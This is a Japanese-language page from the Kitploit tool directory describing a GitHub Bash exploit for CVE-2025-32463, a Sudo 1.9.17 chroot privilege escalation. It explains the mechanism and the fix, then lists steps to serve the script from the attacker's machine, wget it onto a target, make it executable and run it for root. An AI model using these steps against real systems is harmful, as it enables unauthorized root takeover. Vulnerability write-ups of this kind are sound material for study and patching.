Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/justjoeyking/cve-2025-32463
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育レッドチーミング
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

Sudo 1.9.17のchrootオプションを介したローカル権限昇格脆弱性であるCVE-2025-32463のBashエクスプロイトスクリプトで、影響を受けるシステムでルートアクセスを可能にします。

リポジトリを見る
29ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sudo バージョン 1.9.17 には、chroot オプションを悪用することでローカルユーザーが root アクセスを取得できる深刻な脆弱性 (CVE-2025-32463) があり、重大なセキュリティリスクにつながる可能性があります。 ユーザーは、この問題を緩和するためにバージョン 1.9.17p1 以降に更新することを推奨します。

Sudo 1.9.17 の脆弱性の概要:-

Sudo バージョン 1.9.17 の脆弱性 (CVE-2025-32463) は、ローカルユーザーが root アクセスを取得できる重大な欠陥です。この問題は、Sudo が --chroot (-R) オプション (プロセスを分離するためにルートディレクトリを変更することを目的としたもの) を処理する方法の変更に起因します。

脆弱性の仕組み:-

パス解決の問題: バージョン 1.9.14 から 1.9.17 では、 Sudo はユーザーの権限を確認する前に --chroot オプションを評価します。 これにより、攻撃者は環境を制御し、悪意のあるライブラリをロードできるようになります。

悪用の手順:

攻撃者は、自分が制御するディレクトリに悪意のある nsswitch.conf ファイルを作成します。 攻撃者は -R オプションを指定して Sudo を実行し、Sudo に攻撃者の設定とライブラリをロードさせ、root アクセスを取得します。

私は bash スクリプト "cwoot.sh" を作成しました。これを実行すると、直接 root ユーザーに昇格します。

以下の手順を実行してください:

リポジトリからスクリプトをダウンロード: git clone https://github.com/justjoeyking/CVE-2025-32463.git

自機で: python3 -m http.server 8080

ターゲットマシンで: wget http://<自身のIPアドレス>:8080/cwoot.sh

ターゲットマシンで: chmod 755 cwoot.sh

ターゲットマシンでスクリプトを実行: ./cwoot.sh

ツールをダウンロード